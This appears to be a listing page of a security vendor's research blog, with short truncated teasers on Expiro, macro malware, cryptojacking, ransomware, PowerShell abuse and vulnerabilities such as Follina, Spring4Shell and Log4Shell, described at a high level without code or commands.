A recent virus infection faced by some users was swiftly detected as being caused by Expiro. We have conducted an in-depth investigation and analysis on the intricacies of Expiro and what makes it such a potent threat. This article lays out our analysis and understanding of the matter from our Security Research Lab and offers […]
Microsoft Office documents are used worldwide by both corporates and home-users alike. It’s different office versions, whether licensed or unlicensed offers users an easy way to create and modify files. However, this software is also susceptible to cyberattacks. Cybercriminals often take advantage of its vulnerability and use VBA (Visual Basic Application) macros as entry […]
There has been a steep rise in Cryptojacking attacks by cybercriminal groups to infiltrate networks and stealthily mine for coins. With a visible annual increase by 37%, Quick Heal has detected 14.3 Million cases of these attacks through 2022. Large-scale cryptojacking is fast emerging as a popular trend in the Cybercrime scenario. Let us explore […]
With Ransomware attacks surging dramatically over the past year, and reports pegging it as 25% of the total Cyberthreats in 2022, the question is, how is it escalating to admin level to perform encryption at such a scale? In this blog, researchers at Quick Heal decrypt one probable technique used by malware to encrypt all […]
Ransomware is a sophisticated malware that infects computing devices and holds the data hostage intending to extort money from its victims. Ransomware uses encryption techniques that render the victim’s data unusable. Ransomware attacks have evolved with time, and the encryption techniques to harm victims have also become sophisticated, which are often challenging to break. […]
PowerShell was originally intended as a task automation and configuration management program for system administrators. However, it didn’t take long for attackers to realize its potential for carrying out offensive operations without being detected. Due to PowerShell’s versatility, it can be seen in all stages of attacks, from initial infection vectors; used in macros […]
A Zero-day Remote Code Execution Vulnerability with high severity has been identified as CVE-2022-30190 “FOLLINA” in Microsoft Windows Support Diagnostic Tool (MSDT). MSDT is a tool present on Windows version 7 and above and is used for diagnosis of problems in applications such as Ms Office Documents when any user reports problem to Microsoft support. […]
A Zero-day Remote Code Execution Vulnerability with critical severity has been identified as CVE-2022-22965 aka Spring4Shell or SpringShell in Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19 & older. The Spring Framework is an open-source, popular, feature-rich application framework used for building modern & enterprise Java web applications. Publicly available exploits in this widely […]
A critical zero-day vulnerability (CVE-2021-44228) recently discovered Apache Log4J, the popular java open source logging library used in countless worldwide applications. The maximum severity vulnerability has been identified as ‘Log4Shell‘, which, if exploited, could permit a remote attacker to take control of vulnerable systems and execute arbitrary code remotely. According to some security researchers, the […]
It’s surprising to see how quickly attackers make use of new vulnerabilities in malware campaigns. Microsoft recently patched a very interesting vulnerability in their monthly Patch Tuesday update for January 2020. It’s a spoofing vulnerability in Windows CryptoAPI (Crypt32.dll) validation mechanism for Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using […]